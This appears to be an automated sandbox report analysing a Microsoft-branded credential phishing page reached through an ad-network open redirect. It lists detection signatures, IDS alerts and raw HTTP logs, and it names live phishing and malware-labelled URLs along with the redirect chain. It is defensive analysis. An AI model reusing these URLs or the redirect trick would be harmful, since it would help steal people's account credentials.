Create Interactive Tour

Windows Analysis Report
https://ad.broadstreetads.com/click/808995/c536057/z64631?destination=https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N

Overview

General Information

Sample URL:	https://ad.broadstreetads.com/click/808995/c536057/z64631?destination=https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N
Analysis ID:	1551556
Infos:

Detection

HTMLPhisher, Mamba2FA

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Suricata IDS alerts for network traffic

Yara detected HtmlPhish10

Yara detected Mamba 2FA PaaS

Detected use of open redirect vulnerability

Phishing site detected (based on image similarity)

Phishing site detected (based on logo match)

Detected suspicious crossdomain redirect

HTML body contains low number of good links

HTML body contains password input but no form action

HTML title does not match URL

Invalid 'forgot password' link found

Invalid T&C link found

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Classification

Process Tree

System is w10x64_ra

chrome.exe (PID: 6304 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7024 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1856,i,6406461153293948782,16482880529219754941,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6676 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ad.broadstreetads.com/click/808995/c536057/z64631?destination=https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author
1.1.pages.csv	JoeSecurity_Mamba2FA	Yara detected Mamba 2FA PaaS	Joe Security
1.1.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
1.3.pages.csv	JoeSecurity_Mamba2FA	Yara detected Mamba 2FA PaaS	Joe Security
1.3.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
1.2.pages.csv	JoeSecurity_Mamba2FA	Yara detected Mamba 2FA PaaS	Joe Security
1.2.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
1.0.pages.csv	JoeSecurity_Mamba2FA	Yara detected Mamba 2FA PaaS	Joe Security
1.0.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
Click to see the 3 entries

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T21:04:47.815141+0100	2022930	1	A Network Trojan was detected	52.149.20.212	443	192.168.2.16	49744	TCP
2024-11-07T21:05:25.379593+0100	2022930	1	A Network Trojan was detected	52.149.20.212	443	192.168.2.16	49756	TCP

ET PHISHING Generic Credential Phish Landing Page (jsnom.js)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T21:04:42.050681+0100	2056316	1	Successful Credential Theft Detected	192.168.2.16	49712	192.254.225.46	443	TCP
2024-11-07T21:04:43.489310+0100	2056316	1	Successful Credential Theft Detected	192.168.2.16	49717	192.254.225.46	443	TCP

ET PHISHING Javascript Browser Fingerprinting POST Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T21:04:40.819753+0100	2056643	2	Possible Social Engineering Attempted	192.168.2.16	49713	192.254.225.46	443	TCP
2024-11-07T21:05:25.268503+0100	2056643	2	Possible Social Engineering Attempted	192.168.2.16	49759	192.254.225.46	443	TCP
2024-11-07T21:06:25.082510+0100	2056643	2	Possible Social Engineering Attempted	192.168.2.16	49781	192.254.225.46	443	TCP

Joe Sandbox Signatures

• AV Detection
• Phishing
• Compliance
• Networking
• System Summary
• Boot Survival

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: https://ad.broadstreetads.com/click/808995/c536057/z64631?destination=https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N

SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

Antivirus detection for URL or domain

Source: https://drensyoons1sedt.com/socket.io/?EIO=4&transport=polling&t=PC8F2Sv&sid=NSMKkWgqL-vKTiOJABa9	Avira URL Cloud: Label: malware
Source: https://drensyoons1sedt.com/socket.io/?EIO=4&transport=polling&t=PC8F2Su&sid=NSMKkWgqL-vKTiOJABa9	Avira URL Cloud: Label: malware
Source: https://drensyoons1sedt.com/socket.io/?EIO=4&transport=polling&t=PC8F1xk	Avira URL Cloud: Label: malware
Source: https://drensyoons1sedt.com/socket.io/?EIO=4&transport=polling&t=PC8El5Y	Avira URL Cloud: Label: malware
Source: https://drensyoons1sedt.com/socket.io/?EIO=4&transport=polling&t=PC8ElUm&sid=9ayRm2PCzdhJEleuABan	Avira URL Cloud: Label: malware
Source: https://drensyoons1sedt.com/socket.io/?EIO=4&transport=polling&t=PC8ElUl&sid=9ayRm2PCzdhJEleuABan	Avira URL Cloud: Label: malware
Source: https://drensyoons1sedt.com/socket.io/?EIO=4&transport=websocket&sid=9ayRm2PCzdhJEleuABan	Avira URL Cloud: Label: malware
Source: https://drensyoons1sedt.com/socket.io/?EIO=4&transport=polling&t=PC8EqbU&sid=9ayRm2PCzdhJEleuABan	Avira URL Cloud: Label: malware
Source: https://drensyoons1sedt.com/socket.io/?EIO=4&transport=websocket&sid=NSMKkWgqL-vKTiOJABa9	Avira URL Cloud: Label: malware

Phishing

AI detected phishing page

Source: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N	LLM: Score: 7 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The URL 'carolyndc.com' does not match the legitimate domain for Microsoft., The URL does not contain any recognizable association with Microsoft, which is suspicious., The presence of input fields related to account access and creation is typical for phishing attempts targeting Microsoft accounts., The domain 'carolyndc.com' does not have any known association with Microsoft, increasing the likelihood of phishing. DOM: 1.1.pages.csv
Source: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N	LLM: Score: 7 Reasons: The brand 'Microsoft' is a well-known global technology company., The URL 'carolyndc.com' does not match the legitimate domain 'microsoft.com'., There is no direct association between 'carolyndc.com' and Microsoft., The URL does not contain any recognizable elements related to Microsoft., The presence of input fields for 'Email, phone or Skype' suggests an attempt to collect sensitive information, which is common in phishing sites. DOM: 1.3.pages.csv

Yara detected HtmlPhish10

Source: Yara match	File source: 1.1.pages.csv, type: HTML
Source: Yara match	File source: 1.3.pages.csv, type: HTML
Source: Yara match	File source: 1.2.pages.csv, type: HTML
Source: Yara match	File source: 1.0.pages.csv, type: HTML

Yara detected Mamba 2FA PaaS

Source: Yara match	File source: 1.1.pages.csv, type: HTML
Source: Yara match	File source: 1.3.pages.csv, type: HTML
Source: Yara match	File source: 1.2.pages.csv, type: HTML
Source: Yara match	File source: 1.0.pages.csv, type: HTML

Detected use of open redirect vulnerability

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

HTTP traffic: Proxy from: ad.broadstreetads.com/click/808995/c536057/z64631?destination=https://carolyndc.com/m/?c3y9bzm2nv8xx25vbszyyw5kpvjfvxiamue9jnvpzd1vu0vsmtqxmdlwmjrvmtqxmde0ntc=n0123n to https://carolyndc.com/m/?c3y9bzm2nv8xx25vbszyyw5kpvjfvxiamue9jnvpzd1vu0vsmtqxmdlwmjrvmtqxmde0ntc=n0123n

Phishing site detected (based on image similarity)

Source: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N

Matcher: Found strong image similarity, brand: MICROSOFT

Phishing site detected (based on logo match)

Source: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N	Matcher: Template: microsoft matched
Source: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N	Matcher: Template: microsoft matched
Source: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N	Matcher: Template: microsoft matched

Source: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N

HTTP Parser: Number of links: 0

Source: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N

HTTP Parser: Title: Authenticating ... does not match URL

Source: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N

HTTP Parser: Invalid link: Forgot password?

Source: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N	HTTP Parser: Invalid link: Terms of use
Source: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N	HTTP Parser: Invalid link: Privacy & cookies
Source: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N	HTTP Parser: Invalid link: Terms of use
Source: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N	HTTP Parser: Invalid link: Privacy & cookies
Source: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N	HTTP Parser: Invalid link: Terms of use
Source: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N	HTTP Parser: Invalid link: Privacy & cookies
Source: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N	HTTP Parser: Invalid link: Terms of use
Source: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N	HTTP Parser: Invalid link: Privacy & cookies

Source: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N

HTTP Parser: <input type="password" .../> found

Source: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N	HTTP Parser: No favicon
Source: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N	HTTP Parser: No favicon
Source: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N	HTTP Parser: No favicon
Source: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N	HTTP Parser: No favicon

Source: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N	HTTP Parser: No <meta name="author".. found
Source: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N	HTTP Parser: No <meta name="author".. found
Source: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N	HTTP Parser: No <meta name="author".. found
Source: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N	HTTP Parser: No <meta name="author".. found

Source: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N	HTTP Parser: No <meta name="copyright".. found
Source: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N	HTTP Parser: No <meta name="copyright".. found
Source: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N	HTTP Parser: No <meta name="copyright".. found
Source: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N	HTTP Parser: No <meta name="copyright".. found

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries

Jump to behavior

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49756 version: TLS 1.2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2056316 - Severity 1 - ET PHISHING Generic Credential Phish Landing Page (jsnom.js) : 192.168.2.16:49712 -> 192.254.225.46:443
Source: Network traffic	Suricata IDS: 2056316 - Severity 1 - ET PHISHING Generic Credential Phish Landing Page (jsnom.js) : 192.168.2.16:49717 -> 192.254.225.46:443

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

HTTP traffic: Redirect from: ad.broadstreetads.com to https://carolyndc.com/m/?c3y9bzm2nv8xx25vbszyyw5kpvjfvxiamue9jnvpzd1vu0vsmtqxmdlwmjrvmtqxmde0ntc=n0123n

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.16:49744
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.16:49756
Source: Network traffic	Suricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.16:49713 -> 192.254.225.46:443
Source: Network traffic	Suricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.16:49781 -> 192.254.225.46:443
Source: Network traffic	Suricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.16:49759 -> 192.254.225.46:443

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10

Source: global traffic	HTTP traffic detected: GET /click/808995/c536057/z64631?destination=https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N HTTP/1.1Host: ad.broadstreetads.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N HTTP/1.1Host: carolyndc.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /m/jsnom.js HTTP/1.1Host: carolyndc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123NAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /4.7.5/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://carolyndc.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://carolyndc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /m/jsnom.js HTTP/1.1Host: carolyndc.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://carolyndc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: carolyndc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123NAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://carolyndc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://carolyndc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://carolyndc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /4.7.5/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /w3css/4/w3.css HTTP/1.1Host: www.w3schools.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://carolyndc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
